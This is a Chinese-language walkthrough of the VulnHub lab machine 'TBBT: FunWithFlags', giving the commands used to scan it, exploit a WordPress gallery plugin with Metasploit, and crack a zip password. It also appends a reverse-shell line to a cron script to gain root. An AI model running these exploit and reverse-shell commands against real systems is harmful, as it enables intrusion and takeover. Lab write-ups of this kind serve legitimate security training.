TBBT: FunWithFlags靶场渗透
TBBT: FunWithFlags
来自 <https://www.vulnhub.com/entry/tbbt-funwithflags,437/>
1,注意给kali添加一块网卡,配置为仅主机模式,网段192.168.1.0/24
2,攻击机上做namp局域网扫描发现靶机
nmap -sn 192.168.1.0/24
那么攻击机IP为192.168.1.128,靶场IP192.168.1.105
3,对靶机进行端口服务探测
nmap -sV -T4 -p- -A 192.168.1.105
| 端口号 | 状态 | 服务类型 | 服务版本 / 标识 | 核心特点(关键信息) |
| 21/tcp | 开放 | ftp | vsftpd 3.0.3 | 支持匿名登录,含 Welcome.txt、pub / 目录 |
| 22/tcp | 开放 | ssh | OpenSSH 7.2p2 Ubuntu | 需账号密码登录,无直接漏洞 |
| 80/tcp | 开放 | http | Apache httpd 2.4.18 | 泄露 4 个敏感路径(含 /web_shell.php) |
| 1337/tcp | 开放 | 自定义服务 | 未识别(标记为 waste?) | 任意请求返回 Flag:FLAG-sheldon {...} |
4,匿名登录到ftp服务器
ftp 192.168.1.105
存在两个文本文件,下载下来
查看一下文本文件有什么
附言:请勿在此处存储重要文件,因为本服务器设置为允许匿名访问且对公众开放。
说明ftp服务器可能不存在重要内容
5,再尝试访问80端口的http服务
再扫描其子目录看看
gobuster dir -u http://192.168.1.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400
http://192.168.1.105/robots.txt
gobuster dir -u http://192.168.1.105/music -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400
http://192.168.1.105/music/wordpress/
6,wpscan扫描枚举出用户
wpscan --url http://192.168.1.105/music/wordpress/ -e u,p
footprintsonthemoon、stuart、kripke
并且扫描出存在漏洞的插件
searchsploit reflex
7,使用metasploit框架对网站进行渗透攻击
msfconsole -q
search reflex gallery
use exploit/unix/webapp/wp_reflexgallery_file_upload
options
set rhosts 192.168.1.105
set targeturi /music/wordpress
set LHOST 192.168.1.128
exploit
成功getshell
8,获取可交互shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
再来信息收集一下
无法sudo -l提权
9,发现一个有助于提权的文件
可读可写可执行,脚本也已配置为每分钟运行一次。意味着我可以进行计划任务提权,写入反弹shell的命令
echo 'bash -c "bash -i >& /dev/tcp/192.168.1.128/1234 0>&1"' >>thermostat_set_temp.sh
kali要监听1234端口
成功提权变成root,得到第一个flag
10,目标是收集七个flag。先看amy用户
cat /home/amy/notes.txt
strings /home/amy/secretdiary
于是得到第二个flag
11,在网站配置文件里面发现用户名密码bigpharmacorp/weareevil
cd /var/www/html/private
cat db_config.php
登录成功后,得到第三个flag
http://192.168.1.105/phpmyadmin/sql.php?server=1&db=bigpharmacorp&table=users&pos=0&token=b5ddf0c010a7b2d360c242c1651e729b
12,进入penny目录,发现.FLAG.penny.txt
解码得到第四个flag
13,访问1337端口,得到第五个flag
14,去看看wordpress的数据库配置文件
cat /var/www/html/music/wordpress/wp-config.php
得到数据库账户密码footprintsonthemoon/footprintsonthemoon1337
mysql -u footprintsonthemoon -p
show databases;
use footprintsonthemoon;
show tables;
select * from wp_posts;
在wp_posts表中找到第六个flag
15,回到kali登录到ftp服务器
下载压缩包文件super_secret_nasa_stuff_here.zip。需要密码,这里使用zip2john结合john爆破
zip2john super_secret_nasa_stuff_here.zip >hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
使用密码astronaut 解压压缩包
密码为iloveyoumom,查看marsroversketch.jpg.out,拿下第七个flag